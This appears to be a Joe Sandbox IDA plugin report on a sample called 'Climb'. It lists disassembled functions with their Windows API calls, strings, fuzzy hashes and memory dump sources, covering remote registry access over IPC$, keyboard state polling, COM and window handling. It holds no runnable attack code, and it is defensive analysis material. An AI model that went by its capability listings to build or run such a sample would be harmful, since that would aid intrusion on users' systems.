Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: HandleLoadModuleString$Message_wcslen
String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
API String ID: 747408836-2268648507
Opcode ID: 47f6af890524898724e24b85da6868398417576abc7531ca57b6c5f59aef2ed0
Instruction ID: 5556bc82e6bfb565d53228731f398f42e29363644f95c8a21b2a5401e53adf6f
Opcode Fuzzy Hash: 47f6af890524898724e24b85da6868398417576abc7531ca57b6c5f59aef2ed0
Instruction Fuzzy Hash: 4841437180011DAACF04EBE1DD56DFE7B78EF58305F10056ABA01B2092DB356F09CBA5

Function 00550FCF Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 127registryshareCOMMON

Download Yara Rule

APIs

Part of subcall function 004F8577: _wcslen.LIBCMT ref: 004F858A

WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00551093
RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 005510AF
RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 005510CB
RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 005510F5
CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 0055111D
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00551128
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0055112D

Strings

\IPC$, xrefs: 00551075
SOFTWARE\Classes\, xrefs: 00550FFF
\CLSID, xrefs: 00551015

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
String ID: SOFTWARE\Classes\$\CLSID$\IPC$
API String ID: 323675364-22481851
Opcode ID: 4c6c75aeb8b1bd9c1a45b36b5b5a89cbcc3b0a245a5889314923504bea71821c
Instruction ID: f16d4839c6f98f825c2b5d7a9557cd6d97114f130be66a1a99f05b453a082328
Opcode Fuzzy Hash: 4c6c75aeb8b1bd9c1a45b36b5b5a89cbcc3b0a245a5889314923504bea71821c
Instruction Fuzzy Hash: D1410B72C1062DABCF11EBA5DC55DFDBBB8FF14754F00406AEA11A61A0EB355E08CBA4

Function 00584A34 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON

Download Yara Rule

APIs

MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00584AD9
CreateCompatibleDC.GDI32(00000000), ref: 00584AE0
SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00584AF3
SelectObject.GDI32(00000000,00000000), ref: 00584AFB
GetPixel.GDI32(00000000,00000000,00000000), ref: 00584B06
DeleteDC.GDI32(00000000), ref: 00584B10
GetWindowLongW.USER32(?,000000EC), ref: 00584B1A
SetLayeredWindowAttributes.USER32(?,?,00000000,00000001,?,00000000,?), ref: 00584B30
DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?), ref: 00584B3C

Strings

static, xrefs: 00584A71

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
String ID: static
API String ID: 2559357485-2160076837
Opcode ID: 14d0e61bfb830ca3db833853c19296613591108a6c73d6e4d981dec391deb46b
Instruction ID: d1f29d9da4d85e6b5da6ffb272ec03d0d6bb0e9e4cbf5c3432b88a1d43767cfc
Opcode Fuzzy Hash: 14d0e61bfb830ca3db833853c19296613591108a6c73d6e4d981dec391deb46b
Instruction Fuzzy Hash: EA31383210021AABDF11AFA5DC08FEA3FAAFF19765F110215FE15A61E0C735D854EBA4

Function 0057468D Relevance: 16.8, APIs: 11, Instructions: 344fileCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 005746B9
CoInitialize.OLE32(00000000), ref: 005746E7
CoUninitialize.OLE32 ref: 005746F1
_wcslen.LIBCMT ref: 0057478A
GetRunningObjectTable.OLE32(00000000,?), ref: 0057480E
SetErrorMode.KERNEL32(00000001,00000029), ref: 00574932
CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 0057496B
CoGetObject.OLE32(?,00000000,00590B64,?), ref: 0057498A
SetErrorMode.KERNEL32(00000000), ref: 0057499D
SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00574A21
VariantClear.OLEAUT32(?), ref: 00574A35

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
String ID:
API String ID: 429561992-0
Opcode ID: 7fad64b4ce624d057ee9315d03ab8f2460df2b7fbb5c8e6221149c4736605740
Instruction ID: bcbd98906a9948f3d56625f172904cf787f888bf0093e8f34f1bc5039f8ad923
Opcode Fuzzy Hash: 7fad64b4ce624d057ee9315d03ab8f2460df2b7fbb5c8e6221149c4736605740
Instruction Fuzzy Hash: C8C135B1604305AFD700DF68D88492BBBE9FF89748F10891DF9899B261DB31ED05DB52

Function 005684DB Relevance: 16.8, APIs: 11, Instructions: 298comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00568538
SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 005685D4
SHGetDesktopFolder.SHELL32(?), ref: 005685E8
CoCreateInstance.OLE32(00590CD4,00000000,00000001,005B7E8C,?), ref: 00568634
SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 005686B9
CoTaskMemFree.OLE32(?,?), ref: 00568711
SHBrowseForFolderW.SHELL32(?), ref: 0056879C
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 005687BF
CoTaskMemFree.OLE32(00000000), ref: 005687C6
CoTaskMemFree.OLE32(00000000), ref: 0056881B
CoUninitialize.OLE32 ref: 00568821

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
String ID:
API String ID: 2762341140-0
Opcode ID: e940eaf66d02a94b58e709aed09deeabe8c20545f8b88de5b21c64e983ca6a24
Instruction ID: fb0ebf5115a461eff865d72c8a3d356e05e6d1a7178b9fe764707a7345f8edf8
Opcode Fuzzy Hash: e940eaf66d02a94b58e709aed09deeabe8c20545f8b88de5b21c64e983ca6a24
Instruction Fuzzy Hash: 62C12B75A00109AFCB14DFA5C888DAEBBF5FF48304B148599E91AEB361DB31ED45CB90

Function 00550378 Relevance: 16.6, APIs: 11, Instructions: 122memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 0055039F
SafeArrayAllocData.OLEAUT32(?), ref: 005503F8
VariantInit.OLEAUT32(?), ref: 0055040A
SafeArrayAccessData.OLEAUT32(?,?), ref: 0055042A
VariantCopy.OLEAUT32(?,?), ref: 0055047D
SafeArrayUnaccessData.OLEAUT32(?), ref: 00550491
VariantClear.OLEAUT32(?), ref: 005504A6
SafeArrayDestroyData.OLEAUT32(?), ref: 005504B3
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 005504BC
VariantClear.OLEAUT32(?), ref: 005504CE
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 005504D9

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: 0f5c29389e4079e03f305c41d0015638323a89758e1987dacc06b9a5aa02b546
Instruction ID: 77ca45ea58038b7f1fc150e7c74a7ea3855034182b878d5a48ac60f848b04b5b
Opcode Fuzzy Hash: 0f5c29389e4079e03f305c41d0015638323a89758e1987dacc06b9a5aa02b546
Instruction Fuzzy Hash: C3417031A00219DFCF10DFA4D8589AE7FB9FF58355F009429ED05A72A1CB74A949DFA0

Function 0055A635 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 0055A65D
GetAsyncKeyState.USER32(000000A0), ref: 0055A6DE
GetKeyState.USER32(000000A0), ref: 0055A6F9
GetAsyncKeyState.USER32(000000A1), ref: 0055A713
GetKeyState.USER32(000000A1), ref: 0055A728
GetAsyncKeyState.USER32(00000011), ref: 0055A740
GetKeyState.USER32(00000011), ref: 0055A752
GetAsyncKeyState.USER32(00000012), ref: 0055A76A
GetKeyState.USER32(00000012), ref: 0055A77C
GetAsyncKeyState.USER32(0000005B), ref: 0055A794
GetKeyState.USER32(0000005B), ref: 0055A7A6

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: f793ff29be019015fe985ff2865d6e367591faa3501d874d871abcac684dfd03
Instruction ID: 62e1e0f493fcd2f23f6c1342f1e05689ffd0e1f0ea70b34f1c5ba8c743d5f855
Opcode Fuzzy Hash: f793ff29be019015fe985ff2865d6e367591faa3501d874d871abcac684dfd03
Instruction Fuzzy Hash: 0F41E4749147CA6DFF31866088247A5BEF0BB25305F08825BDDC65A1C2EB9499CCCBA3

Function 00579730 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 193COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,00000000,?), ref: 00579750

Part of subcall function 00559805: _wcslen.LIBCMT ref: 00559828

_wcslen.LIBCMT ref: 005797AB
_wcslen.LIBCMT ref: 005797F9
_wcslen.LIBCMT ref: 00579839
_wcslen.LIBCMT ref: 005798CB

Strings

none, xrefs: 005798C2, 005798C7
cdecl, xrefs: 005797A5, 005797AA
winapi, xrefs: 005797F3, 005797F8
stdcall, xrefs: 00579833, 00579838

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: _wcslen$BuffCharLower
String ID: cdecl$none$stdcall$winapi
API String ID: 707087890-567219261
Opcode ID: f7d2c524a35d4e852726a872c803b2e714acdd84fc45f5c7d78266a2d22172b5
Instruction ID: 42b4e9c99057250a6d55e5481c2c3350dcc47dad34b48aec1e42fd8e2145d3e3
Opcode Fuzzy Hash: f7d2c524a35d4e852726a872c803b2e714acdd84fc45f5c7d78266a2d22172b5
Instruction Fuzzy Hash: AB51D431A0011A9BCB14DF6CD9518FEBBA5FF65364B20822AE92AE7280D731DD40D7A1

Function 00574189 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 187comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32 ref: 005741D1
CoUninitialize.OLE32 ref: 005741DC
CoCreateInstance.OLE32(?,00000000,00000017,00590B44,?), ref: 00574236
IIDFromString.OLE32(?,?), ref: 005742A9
VariantInit.OLEAUT32(?), ref: 00574341
VariantClear.OLEAUT32(?), ref: 00574393

Strings

NULL Pointer assignment, xrefs: 0057427B
Failed to create object, xrefs: 00574241, 005742F7
Invalid parameter, xrefs: 005742C2

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 636576611-1287834457
Opcode ID: e806fca0a7e874c46b6483f13e58c24568579428aea14c0d235a3855a922cf55
Instruction ID: 3241d14e69da2c157b9f78271cc8f47d351a98e5e3e955f58608112a38d0e50b
Opcode Fuzzy Hash: e806fca0a7e874c46b6483f13e58c24568579428aea14c0d235a3855a922cf55
Instruction Fuzzy Hash: D6619F742047019FD710DF54E888B6EBBE8BF89714F104909F9899B292C770ED48DF92

Function 00568BDA Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 186timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 00568C9C
SystemTimeToFileTime.KERNEL32(?,?), ref: 00568CAC
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00568CB8
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00568D55
SetCurrentDirectoryW.KERNEL32(?), ref: 00568D69
SetCurrentDirectoryW.KERNEL32(?), ref: 00568D9B
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00568DD1
SetCurrentDirectoryW.KERNEL32(?), ref: 00568DDA

Strings

*.*, xrefs: 00568DE0

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: CurrentDirectoryTime$File$Local$System
String ID: *.*
API String ID: 1464919966-438819550
Opcode ID: c2d7058779c103769059473e14276d4cc65103028df5f07d9d2a03d65095f06c
Instruction ID: 8ece8819c7dfab308e4e4745694ac6ffc3e56e4d368c875ea9f006ba6e74122d
Opcode Fuzzy Hash: c2d7058779c103769059473e14276d4cc65103028df5f07d9d2a03d65095f06c
Instruction Fuzzy Hash: 9E617BB25043099FDB10EF20C8449AEB7E8FF99314F04491EF999C7291DB35E949CBA2

Function 005846E2 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON

Download Yara Rule

APIs

CreateMenu.USER32 ref: 00584715
SetMenu.USER32(?,00000000), ref: 00584724
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 005847AC
IsMenu.USER32(?), ref: 005847C0
CreatePopupMenu.USER32 ref: 005847CA
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 005847F7
DrawMenuBar.USER32 ref: 005847FF

Strings

F, xrefs: 005847EA
0, xrefs: 005846F0

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: Menu$CreateItem$DrawInfoInsertPopup
String ID: 0$F
API String ID: 161812096-3044882817
Opcode ID: 3f014ea0c237f675cfa1a19a09da7c3e76d792385a17cf713be91703fd02ba62
Instruction ID: d4b524b3fb272ca6a3204e5431ebd2053cb098859378306323834eaf3a0a88ed
Opcode Fuzzy Hash: 3f014ea0c237f675cfa1a19a09da7c3e76d792385a17cf713be91703fd02ba62
Instruction Fuzzy Hash: 41418775A0120AEFDB24EF64D884EAA7BB5FF09314F144029FE45A7390C770A914DF60

Function 0055282C Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 78windowCOMMON

Download Yara Rule

APIs

Part of subcall function 004FB329: _wcslen.LIBCMT ref: 004FB333

Part of subcall function 005545FD: GetClassNameW.USER32(?,?,000000FF), ref: 00554620

SendMessageW.USER32(?,0000018C,000000FF,00020000), ref: 005528B1
GetDlgCtrlID.USER32 ref: 005528BC
GetParent.USER32 ref: 005528D8
SendMessageW.USER32(00000000,?,00000111,?), ref: 005528DB
GetDlgCtrlID.USER32(?), ref: 005528E4
GetParent.USER32(?), ref: 005528F8
SendMessageW.USER32(00000000,?,00000111,?), ref: 005528FB

Strings

ComboBox, xrefs: 00552839
ListBox, xrefs: 0055286E

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_wcslen
String ID: ComboBox$ListBox
API String ID: 711023334-1403004172
Opcode ID: 1bcda87cb6703dda546e2c320c02860886de2dba003f26feaeac07e20380ce00
Instruction ID: 9078e3999ec751764a604cd8ce5e189bc137bc3107ddb075df40a3c267d29a84
Opcode Fuzzy Hash: 1bcda87cb6703dda546e2c320c02860886de2dba003f26feaeac07e20380ce00
Instruction Fuzzy Hash: 2621AF75900118BBCF00ABA1CC95EFEBFB4FF16314F00411ABD51A3291DB395848DB60

Function 0055290D Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 77windowCOMMON

Download Yara Rule

APIs

Part of subcall function 004FB329: _wcslen.LIBCMT ref: 004FB333

Part of subcall function 005545FD: GetClassNameW.USER32(?,?,000000FF), ref: 00554620

SendMessageW.USER32(?,00000186,00020000,00000000), ref: 00552990
GetDlgCtrlID.USER32 ref: 0055299B
GetParent.USER32 ref: 005529B7
SendMessageW.USER32(00000000,?,00000111,?), ref: 005529BA
GetDlgCtrlID.USER32(?), ref: 005529C3
GetParent.USER32(?), ref: 005529D7
SendMessageW.USER32(00000000,?,00000111,?), ref: 005529DA

Strings

ComboBox, xrefs: 0055291A
ListBox, xrefs: 0055294F

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_wcslen
String ID: ComboBox$ListBox
API String ID: 711023334-1403004172
Opcode ID: fd5eee43386740a423c5d2a730501f039de87fd5582e7a221f98dcff9204e6fe
Instruction ID: 9be325fe725083dcbefce6f69e3bc86f5a3d7a007f887e5cc7d722707ff49fde
Opcode Fuzzy Hash: fd5eee43386740a423c5d2a730501f039de87fd5582e7a221f98dcff9204e6fe
Instruction Fuzzy Hash: 4B217CB5900118BBCF01ABA1CC95AFEBFB8FF16314F004017BD51A7291DA795849DBA0

Function 005844BF Relevance: 15.2, APIs: 10, Instructions: 182windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00584539
SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 0058453C
GetWindowLongW.USER32(?,000000F0), ref: 00584563
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00584586
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 005845FE
SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00584648
SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00584663
SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 0058467E
SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00584692
SendMessageW.USER32(?,00001008,00000000,00000007), ref: 005846AF

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: MessageSend$LongWindow
String ID:
API String ID: 312131281-0
Opcode ID: 94473135e109527670752904ca8be3b8f4c8d0c5578e911e52cf4d4eaeff9f6f
Instruction ID: b3e315ca0d804075d14cda3b8697f0b2bffee7d6f55fdbdbd44612ad2d3b36cf
Opcode Fuzzy Hash: 94473135e109527670752904ca8be3b8f4c8d0c5578e911e52cf4d4eaeff9f6f
Instruction Fuzzy Hash: DF616A75A00209AFDB10EFA4CC85EEE7BB8FB49710F100159FE14A72A1D774A945DF50

Function 0055BAF6 Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0055BB18
GetForegroundWindow.USER32(00000000,?,?,?,?,?,0055ABA8,?,00000001), ref: 0055BB2C
GetWindowThreadProcessId.USER32(00000000), ref: 0055BB33
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,0055ABA8,?,00000001), ref: 0055BB42
GetWindowThreadProcessId.USER32(?,00000000), ref: 0055BB54
AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,0055ABA8,?,00000001), ref: 0055BB6D
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,0055ABA8,?,00000001), ref: 0055BB7F
AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,0055ABA8,?,00000001), ref: 0055BBC4
AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,0055ABA8,?,00000001), ref: 0055BBD9
AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,0055ABA8,?,00000001), ref: 0055BBE4

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: Thread$AttachInput$Window$Process$CurrentForeground
String ID:
API String ID: 2156557900-0
Opcode ID: c6b78fe0bad756d6c62bdd615e7f80e84973ad6b1b02064a23f26d6d365c1de0
Instruction ID: 8c7fd8003ec37bd9228adc85308f88d6e783c57390e8d7b038f17536226e9efe
Opcode Fuzzy Hash: c6b78fe0bad756d6c62bdd615e7f80e84973ad6b1b02064a23f26d6d365c1de0
